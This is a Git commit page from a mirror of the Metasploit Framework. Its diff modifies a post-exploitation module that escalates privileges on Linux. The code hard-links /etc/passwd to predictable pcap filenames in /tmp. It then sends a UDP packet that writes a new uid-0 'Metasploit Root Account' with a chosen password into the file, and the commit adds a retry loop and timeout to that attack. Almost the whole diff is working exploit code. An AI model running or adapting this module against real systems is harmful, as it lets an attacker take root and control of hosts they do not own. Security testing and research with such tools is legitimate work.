infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from todb-r7/metasploit-pcaplog 

Loop management, timeouts, and verbosity by todb is full of win
unstable
0a2940 2012-10-24 01:49:35 -07:00
parent 733f656b00 cbce2c0fd5
commit d958c93a5b
1 changed files with 22 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
modules/post/multi/escalate/metasploit_pcaplog.rb
View File

@ -20,7 +20,7 @@ load 'lib/msf/core/exploit/local/unix.rb'
load 'lib/msf/core/exploit/local/linux.rb'
class Metasploit3 < Msf::Post
Rank = ExcellentRanking
Rank = ManualRanking
include Msf::Post::File
include Msf::Post::Common
@ -63,28 +63,40 @@ class Metasploit3 < Msf::Post
[
Opt::RPORT(2940),
OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ])
OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]),
OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5])
], self)
end
def normalize_minutes
datastore["MINUTES"].abs rescue 0
end
def run
print_status "Waiting for victim"
print_status "Setting up the victim's /tmp dir"
initial_size = cmd_exec("cat /etc/passwd | wc -l")
print_status "/etc/passwd is currently #{initial_size} lines long"
i = 0
while(true) do
j = 0
loop do
if (i == 0)
j += 1
break if j >= datastore['MINUTES'] + 1 # Give up after X minutes
# 0a2940: cmd_exec is slow, so send 1 command to do all the links
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
end
if (cmd_exec("cat /etc/passwd | wc -l") != initial_size)
current_size = cmd_exec("cat /etc/passwd | wc -l")
if current_size == initial_size
# PCAP is flowing
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
print_status("Sending file contents payload to #{session.session_host}")
vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
udpsock = Rex::Socket::Udp.create(
{
'Context' => {'Msf' => framework, 'MsfExploit'=>self}
})
udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
else
break
end
sleep(1) # wait a second
@ -93,10 +105,11 @@ class Metasploit3 < Msf::Post
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
# TODO: Consider recording our now-created username and password as a valid credential here.
else
print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added")
print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
end
# 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
# However beceause the session is not a terminal, su will not always allow this.
end
end
end